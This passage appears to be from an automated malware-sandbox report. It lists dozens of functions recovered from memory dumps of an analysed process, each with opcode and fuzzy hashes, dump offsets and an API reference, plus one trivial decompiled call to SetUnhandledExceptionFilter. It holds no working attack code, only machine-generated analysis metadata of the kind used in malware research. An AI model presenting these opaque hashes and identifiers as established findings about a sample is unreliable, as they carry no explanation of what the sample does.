Instruction ID: f050f3ab1372e6937974c751806e90e419891915eb0a948a282edd742b3904d1
Opcode Fuzzy Hash: d18cf161eda75179d87c6314021e1defa3b2a9b265fff93fead0acefcc5ae538
Instruction Fuzzy Hash: 3241E470E01218CBEB18DFAAC9547DEBBF2AF88304F24C12AC414AB255EB355906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594B238, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594B313

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 92f4a629aab8dbc5d57e6747ed77a64a9f96578abd37bae829357b649c8824fd
Instruction ID: f0be2f0f873a92796309e351f423a2dd557905752801472198220ea3ca594eff
Opcode Fuzzy Hash: 92f4a629aab8dbc5d57e6747ed77a64a9f96578abd37bae829357b649c8824fd
Instruction Fuzzy Hash: 1E41C370E012088BEB18DFAAD954ADEBBF3EF88304F24C129D414BB254DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594BAE8, Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594BBC3

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e38ade30a62da91307836de23bb7edb3e2d692b7305f86d4df902be9066ef74b
Instruction ID: 19f750690837900b598df8a7fc0e31257883c9bcb14234e85fd85597f5352490
Opcode Fuzzy Hash: e38ade30a62da91307836de23bb7edb3e2d692b7305f86d4df902be9066ef74b
Instruction Fuzzy Hash: 5441D470E012088BEB18DFAAD954ADEBBF2AF88304F24D129C414BB254DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594DDA9, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594DE83

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fdcb60e361a784abf833b9bf80c336a27131aa01a2bbf24f643fa7dc3505c62e
Instruction ID: 6f3fa99d39d650e17953fd1f9671f4f4d4cbc3c1fdca4cc4eb53b7bc257fe66c
Opcode Fuzzy Hash: fdcb60e361a784abf833b9bf80c336a27131aa01a2bbf24f643fa7dc3505c62e
Instruction Fuzzy Hash: 2541B274E01248CFEB18DFAAD954ADEBBF2AF88304F24C12AD415BB254DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594A530, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594A60B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ec9fd5f7c86e8d65fd116f186f8116431c7e0db73e40c8ca82238c4bf33fe4de
Instruction ID: 3da137c3d4bd5fcfd8228af14999a1d6d66c235d805a5a579f73572bbd799685
Opcode Fuzzy Hash: ec9fd5f7c86e8d65fd116f186f8116431c7e0db73e40c8ca82238c4bf33fe4de
Instruction Fuzzy Hash: AB41D5B0E012488FDB18DFA6D954ADEBBF2FF88304F24C16AC418AB255DB345906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594D951, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594DA2B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7b661cd8b90d9e6cd8819c40f154adc1e057424288004b591d447a661791a520
Instruction ID: f42fec0519d77a50bde947940cf29636f781f05427c8af655e12e4b364ce320b
Opcode Fuzzy Hash: 7b661cd8b90d9e6cd8819c40f154adc1e057424288004b591d447a661791a520
Instruction Fuzzy Hash: A7410474E04208CBDB18DFAAC844ADEFBF2AF88304F24C16AD408BB258DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05949C80, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949D5B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 69ab4c1949fde488f6ed6a2871336705048f972dd50498d044bbd034a0370c1c
Instruction ID: e695eee66db5da04c55bf18c4127d76c37a57c8eb45ce254e8ffb1ca73272d95
Opcode Fuzzy Hash: 69ab4c1949fde488f6ed6a2871336705048f972dd50498d044bbd034a0370c1c
Instruction Fuzzy Hash: D241D570E012088FDB18DFA6D954AEEFBF2AF88304F20C129D419BB254DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594CC48, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594CD23

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1ed49d6802b1f4179e9f69873f7910b21b5528ea219b82fee66a66fa35ad3bf0
Instruction ID: 8f68cab06ae7b8807b08474e9afe59398b8310351f451591369307b4bde4de64
Opcode Fuzzy Hash: 1ed49d6802b1f4179e9f69873f7910b21b5528ea219b82fee66a66fa35ad3bf0
Instruction Fuzzy Hash: F441D475E01248CFEB18DFAAD954AEEBBF2AF88304F24C129D414AB258DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0597457A, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974654

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a0f636e37f0f1f7cacf95a5ac1fca3b6b32a880ab913259bbcf5fa260f5f1144
Instruction ID: ce1f5811b8fb71c452c99cd3991ddc24707d47b9a7b26c179516edb0de823578
Opcode Fuzzy Hash: a0f636e37f0f1f7cacf95a5ac1fca3b6b32a880ab913259bbcf5fa260f5f1144
Instruction Fuzzy Hash: DF41D571E00208CBDB18DFAAD9546DEBBF2AF88304F24C12AC409BB359DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05973CA0, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973D7B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2f9bbf6073e69a8475b89efebbc14482c7de9be46449ac3ccd19f9bd53a72bae
Instruction ID: 471276cd24f9e2671400235af9d27439a18b7412cca684db205112775181c0aa
Opcode Fuzzy Hash: 2f9bbf6073e69a8475b89efebbc14482c7de9be46449ac3ccd19f9bd53a72bae
Instruction Fuzzy Hash: 3D41D270E002488BEB18DFAAD9446DEFBF2BF88304F24D12AC418BB255EB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 059726C2, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0597279B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 236d8cfd3a9630c16bd70e3337f08613965be89ea8e20285fb62defedafc05ef
Instruction ID: 3d70bee0262900e53c43379e6d38eaf9fe560595a045ee9cf3c33e2ff57dcca3
Opcode Fuzzy Hash: 236d8cfd3a9630c16bd70e3337f08613965be89ea8e20285fb62defedafc05ef
Instruction Fuzzy Hash: D541F574E002088BDF18DFAAD9446DEBBF2AF88304F24D12AC414BB255DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05974E28, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974F03

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9cc118f6452f0c63876c176ce87aa704d2b0647a3263489303db9d7d99f8ddf2
Instruction ID: 6f1533dfca6dab3d49209ce37bc42341c4081ddccc103a65f6468252b4c55d74
Opcode Fuzzy Hash: 9cc118f6452f0c63876c176ce87aa704d2b0647a3263489303db9d7d99f8ddf2
Instruction Fuzzy Hash: C341C070E012488BEB58DFAAD9446DEFBF2AF88304F24D16AC419AB259DB355906CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594A98A, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594AA63

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9e857831e4ab6629f8e1e5720573cffe53315ccb8c9d6f3bf9fab67423d25817
Instruction ID: c5ce2b0defd28000cdfa6d3daaec6e0993599587c3d57fddecd77df1ab2ddcbd
Opcode Fuzzy Hash: 9e857831e4ab6629f8e1e5720573cffe53315ccb8c9d6f3bf9fab67423d25817
Instruction Fuzzy Hash: A941C570E012588BEB18DFAAD954ADEBBF3AF88304F24D12AC415BB254DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 059493D2, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059494AB

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 19620269daf6daaf7e13be113ba9864910ea48b52a9862313283c414efde0892
Instruction ID: a1b874edb2e065c43e30f35f38895b43153f93028e096e14814c34c4ae13e185
Opcode Fuzzy Hash: 19620269daf6daaf7e13be113ba9864910ea48b52a9862313283c414efde0892
Instruction Fuzzy Hash: 3441D570E012588BDB18DFAAD954ADEFBF2AF88304F24D16AC404BB259DB345906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05948B21, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05948BFB

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1b5b870eb0b6ea095d38ea90ed452e2daf9ec762f357d6e90507d67143cce396
Instruction ID: f474d933ddd02b02551dd1720275db66b3e2e0561b1a89039cc72e59fec9cfd5
Opcode Fuzzy Hash: 1b5b870eb0b6ea095d38ea90ed452e2daf9ec762f357d6e90507d67143cce396
Instruction Fuzzy Hash: 6341D370E01208CBEB18DFA6D544ADEFBF2BF88304F20C16AC819AB259DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594BF42, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C01B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: efdfd7405b11963974ff2e09e0cefd559bac3a63dbe3909a0a60ed975ddb53f6
Instruction ID: 219a82c8b453d1fdbf00156de01fbc72238144b2ab4329e7bfc2cc4229d6a6f3
Opcode Fuzzy Hash: efdfd7405b11963974ff2e09e0cefd559bac3a63dbe3909a0a60ed975ddb53f6
Instruction Fuzzy Hash: 8A41D470E01248CFEB18DFAAD954AEEBBF2AF89304F24C16AD414AB254DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05948F78, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949053

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 095ef01cd0679c3b383f7b06a6236621bf3564a5e944b7238f1c833ddd9e2e0d
Instruction ID: 5a4247b26396544b308973b29f9ca8bbac813219b28fbda14c8c7851bc8f31e3
Opcode Fuzzy Hash: 095ef01cd0679c3b383f7b06a6236621bf3564a5e944b7238f1c833ddd9e2e0d
Instruction Fuzzy Hash: CC41D5B4E00208CBEB18DFA6D5546DEFBF2EF89300F24C16AD419AB254DB355906CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594D0A0, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594D17B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 213e12d3d21217d4f2841eca8d395f9cdaeb63b0237faa20e507c8802dc1e20b
Instruction ID: 1f3e7a5528215403fce14b98251e2159a584c08cbc170801ce995138b82781d6
Opcode Fuzzy Hash: 213e12d3d21217d4f2841eca8d395f9cdaeb63b0237faa20e507c8802dc1e20b
Instruction Fuzzy Hash: 0941D574E012488BDB18DFA6D954ADEBBF2AF88304F24D16AC414BB355DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594A0D8, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594A1B3

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c54159f3216475bbcec3ee2bb338e04642796542d7e9f7ff582de49d215278f6
Instruction ID: fa12e5403a3a395725557faf268bd1ed78e62762a8790184b16dbc259e6230fd
Opcode Fuzzy Hash: c54159f3216475bbcec3ee2bb338e04642796542d7e9f7ff582de49d215278f6
Instruction Fuzzy Hash: 1D41D470E052488BEB18DFA6D554ADEFBF3AF88304F24D12AC415AB254DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594D4FA, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594D5D3

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 51dfa75d6afc801f390d1443b16bcf0ba0e2445ccec4e21ac14efdb6fd3127b0
Instruction ID: 498633d64d3fc05074db8cd50008f6fb9fa514a19b3391618295217fd984f166
Opcode Fuzzy Hash: 51dfa75d6afc801f390d1443b16bcf0ba0e2445ccec4e21ac14efdb6fd3127b0
Instruction Fuzzy Hash: C341C574E012488BDB18DFAAD954ADEFBF2AF88304F24D12AC419BB258DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05972F9A, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973073

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ab5464748f8e0dcf34a2d10850b7b8e53a10c97ff5bc62e1a348dcbfad0133f8
Instruction ID: 7e654a9bf930db8cd8015174ac9918801a9d161503d022eef6cf351a1df3fe21
Opcode Fuzzy Hash: ab5464748f8e0dcf34a2d10850b7b8e53a10c97ff5bc62e1a348dcbfad0133f8
Instruction Fuzzy Hash: 9A41D171E002488BEB18DFAAD9546DEFBF2EF88304F24C56AC415AB258EB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05975F88, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05976063

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 810324851fb644aa894d4e17dc521a53d10d64fe40d48559cc74f457c70961a6
Instruction ID: d5584cd0318c7f2b142ed9184574c787ff8b76d2345b72fdc68de0f552dcb509
Opcode Fuzzy Hash: 810324851fb644aa894d4e17dc521a53d10d64fe40d48559cc74f457c70961a6
Instruction Fuzzy Hash: 2241C374E01618CBDB18DFAAD9546EEFBF2EF88304F24D16AC419AB258DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 059756DA, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059757B3

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7e4e3f58fcd1c48599475203ab71a7e07ae60466ca4d0d7a73354b7bbe9cc077
Instruction ID: 489c69a38956a8b3c4f4380fb670d2dfd960286d4b79705410d751769ee42636
Opcode Fuzzy Hash: 7e4e3f58fcd1c48599475203ab71a7e07ae60466ca4d0d7a73354b7bbe9cc077
Instruction Fuzzy Hash: FA41D570E01248CBDB58DFAAD9946DEFBF2AF88304F24D16AC419AB254EB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594B691, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594B76B

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1b9b6f8a771a0924f62369663c0392e7ffc26e89e509dc5e4afc455dfdd874b5
Instruction ID: dcd3851d381b7e4a00a68cd772e366fee1afc891cf180d7092305eeb4ccabcf8
Opcode Fuzzy Hash: 1b9b6f8a771a0924f62369663c0392e7ffc26e89e509dc5e4afc455dfdd874b5
Instruction Fuzzy Hash: 5941B470E012088BDB18DFA6D554ADEFBF3AF88304F24D12AD419AB258DB355946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059486C7, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059487A3

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9f633040565ec604b35114e9522f6a3e9fa3ffa0d89814b65becc4c10f68375a
Instruction ID: 8f646ceaaa5c9bb2f74f0fb56bea86f978ad2800c4f867bff97c46f4cc5bfe2e
Opcode Fuzzy Hash: 9f633040565ec604b35114e9522f6a3e9fa3ffa0d89814b65becc4c10f68375a
Instruction Fuzzy Hash: 4241E370E00248CBEB18DFAAD554ADEFBF2AF89304F24C16AC414BB259DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 05949828, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05949903

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: dd3b8cd3b45f09a69a8b02066755e6a9476ca1e5ef0fdd7b6df76c1e3829c5f7
Instruction ID: 685f86defc1b4b800da0fa9c480df133b2aa81e9d66bb612b68bd973d68bf627
Opcode Fuzzy Hash: dd3b8cd3b45f09a69a8b02066755e6a9476ca1e5ef0fdd7b6df76c1e3829c5f7
Instruction Fuzzy Hash: 9B41B270E012488BEB18DFAAD954ADEFBF2EF88304F24D169C419AB259DB355946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594C398, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C473

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 68b941e0c4ffefe536a7cc18794d9767df7bfae6ef80153e34bf75c561884b72
Instruction ID: f71fc6a654d43056a41f3f170512ee0b10039c8d5895e5eefc346440290c771c
Opcode Fuzzy Hash: 68b941e0c4ffefe536a7cc18794d9767df7bfae6ef80153e34bf75c561884b72
Instruction Fuzzy Hash: B641C570E01208CFEB18DFA6D554A9EBBF2AF88304F24D169D415AB258DB355945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0594ADE0, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594AEBB

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 743b698d47075671f384cfd5a5d2efade81604902bc5277b070028dae0843d30
Instruction ID: 00f3b7567ede7d9e845382216905c35c46e5ee2ad3ed23dc50fb5d682b6fc858
Opcode Fuzzy Hash: 743b698d47075671f384cfd5a5d2efade81604902bc5277b070028dae0843d30
Instruction Fuzzy Hash: 3B41B270E01248CBEB18DFAAD954A9EFBF3AF88304F24D169D415BB258DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0594C7F0, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0594C8CB

Memory Dump Source

Source File: 00000002.00000002.928776129.0000000005940000.00000040.00000001.sdmp, Offset: 05940000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1c5e9a454b11422d2a6901421b9acc5aab8054f77dcb817bc192820c1f70dc66
Instruction ID: cbf207d4fcb08592a46a5ea803948003290df7f1db725f21b59d3778664e26b0
Opcode Fuzzy Hash: 1c5e9a454b11422d2a6901421b9acc5aab8054f77dcb817bc192820c1f70dc66
Instruction Fuzzy Hash: F741C374E01248CFDB18DFAAD954AEEFBF2AF88304F24D56AC414AB254DB345946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059749CF, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974AAB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 67c7feefba07a0986ff72997a76407cf45f53a5bf3f3188bbd4efb9297a29cd9
Instruction ID: 3eee5d09b97d98a06988a5936cf4be4900f072d2a5ede14179b18dee2bf1eb5e
Opcode Fuzzy Hash: 67c7feefba07a0986ff72997a76407cf45f53a5bf3f3188bbd4efb9297a29cd9
Instruction Fuzzy Hash: AE41C274E006088BDB18DFAAD55469EBBF2BF88304F20D52AC419AB259DB345946CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}

0x00401e22
0x00401e28

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0234DD06, Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee3ecc697fb5878a20cf12190c062bd94ffa85ddc315ead7985c4ce59b853f5d
Instruction ID: 413f4e41e8b84ae87b9e89495cd941615601fda5c7826a948c069f8ac5e3798c
Opcode Fuzzy Hash: ee3ecc697fb5878a20cf12190c062bd94ffa85ddc315ead7985c4ce59b853f5d
Instruction Fuzzy Hash: 5DD19074E00218CFDB54DFA5D994B9DBBF2BB89304F2081A9D809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0234EA40, Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb020a41c8efa71c32fd1c01df9340e28b3758ac9d6480c9f02e1b2adbc0d927
Instruction ID: 9069103bae6249d29c83e3766946ef1e2ed320ba856c4ccfae696784c8613bf8
Opcode Fuzzy Hash: bb020a41c8efa71c32fd1c01df9340e28b3758ac9d6480c9f02e1b2adbc0d927
Instruction Fuzzy Hash: D8D19E74E00218CFDB54DFA5D994B9DBBB2FB88304F2081A9D809AB355DB355E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0234EEA1, Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d908ce2dfbd9846ec2abb2be9fd264a349e14f1bb25b28d8019b0c940c92c9
Instruction ID: 9af003c59407b48ba1a9d9529af9d684a4359d82fb815f21f38a6657bddddb9f
Opcode Fuzzy Hash: 67d908ce2dfbd9846ec2abb2be9fd264a349e14f1bb25b28d8019b0c940c92c9
Instruction Fuzzy Hash: 0FC1AF78E00218CFDB54DFA5C944B9DBBB2EB88304F2481A9D809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0234E182, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b3f78d52289229ae0479d5c3f98510a6efe46e327ab6aca43ca0c0c8042885f
Instruction ID: 4f41fbdac7b08ec3a09f32318f2e85f6a2aa8785a80ac6fb28fe39e80d8fe8b4
Opcode Fuzzy Hash: 3b3f78d52289229ae0479d5c3f98510a6efe46e327ab6aca43ca0c0c8042885f
Instruction Fuzzy Hash: F5C19F74E00218CFDB54DFA5D954B9DBBB2FB88304F2081A9D809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0234E5E2, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db43793b109e665532e0b6cb6f46c40c0a00c9aa984e9aec01d85c45e3c63648
Instruction ID: 505665c43e62b4a7890b8891e0ac0d15d49092a6e1a9f64cbfd8d1ab6a46fed8
Opcode Fuzzy Hash: db43793b109e665532e0b6cb6f46c40c0a00c9aa984e9aec01d85c45e3c63648
Instruction Fuzzy Hash: A6C19F74E00218CFDB54DFA5D954B9DBBB2FB88304F2081A9D809AB395DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0234D1D0, Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd09aac7faab70b07063f4dd0a7188a54cc488c034c0cb59786f750f13e63d91
Instruction ID: 95340236c15730f9404696649bc197eecab4c6be0f16b26983b6fa331861db00
